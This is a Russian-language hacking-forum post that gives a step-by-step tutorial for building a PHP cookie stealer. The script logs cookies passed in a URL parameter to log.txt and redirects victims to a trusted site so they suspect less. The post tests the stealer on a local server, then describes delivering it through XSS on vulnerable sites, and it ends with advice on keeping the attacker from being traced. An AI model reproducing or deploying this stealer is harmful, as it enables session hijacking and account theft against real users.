Загрузка...

How to create Cookie styler? the answer is!))!)!

Thread in Virology created by Happy Nov 28, 2017. 3373 views

  1. Happy
    Happy Topic starter Nov 28, 2017 Держу курс на заебись 539 Apr 23, 2017
    Code
    [SIZE=4][B]#Обработка cookies через PHP[/B][/SIZE]
    Для начала, создадим новый [B]php[/B]-файл (для тех, кто не знаком с [B]php[/B], рекомендую посмотреть[URL='https://t.me/omnitools/22'] вот это вот[/URL]) в той же директории, где лежит наш [B]index.html[/B]:

    nano cookiestealer.php



    После добавления стандартных php-скобок, определим в файле место для редиректа (перенаправления пользователя):

    Code
    <?php
    header ('Location:https://google.com');
    ?>



    [IMG]
    *Примечание: сайт может быть любым, но лучше использовать доверенный – это вызовет меньше подозрений.



    Теперь, имея редирект, можем добавить коду для обработки cookies. Сначала определим их в переменной

    Code
    $cookies = $_GET"c";



    Далее укажем файл (например, “log.txt”) для сохранения cookies на нашем сервере:

    Code
    $file = fopen('log.txt', 'a');



    Наконец, запишем наши cookies в файл с отступом в две строки (удобочитаемость – это круто):

    Code
    fwrite($file, $cookies . "\n\n");



    Должно стать похожим на это:

    [IMG]
    Сохраним.



    #Тестируем наш cookie-******
    Не выходя из нашей уже обшарканной директории, исполним команду:

    Code
    php -S 127.0.0.1:80



    [IMG]
    Так мы запустим тестовый сервер по указанному нами адресу. Теперь введите в строке браузера указанный Вами IP...

    [IMG]
    ...скорее всего, Вас сразу же перебросит на редирект.

    [IMG]
    Если же посмотрим на **** нашего PHP-сервера, увидим, что данные были переданы в наш файл.

    [IMG]
    Проверим, открыв файл log.txt:

    Code
    cat log.txt



    [IMG]
    Какая удача, файл действительно содержит только что переданные cookies – наш ****** работает!



    #Проведение атаки
    Этот метод ценен своей простотой и объемом наносимого ущерба, а возможности реализации простираются до любого сайта, где можно использовать HTML-тег <script> (=XSS уязвимость). Популярный способ проверки веб-формы на XSS уязвимость – использование обычной функции “alert” как в примере ниже.

    Code
    <script>alert("Alert");</script>



    [IMG]
    Так же, в Kali Linux имеются уже встроенные инструменты для проверки XSS-дыр, но о них я расскажу Вам уже в отдельной статье – подписывайтесь сейчас, если не решались на это ранее

    P.S.
    В настоящих атаках нужно с осторожностью относиться к местонахождению php-скрипта. Пренебрежение этой рекомендации может повлечь ситуации, в которых путь от файла до Вас смогут отследить, а Вам сломать лицо.
     
  2. fantik22
Loading...
Top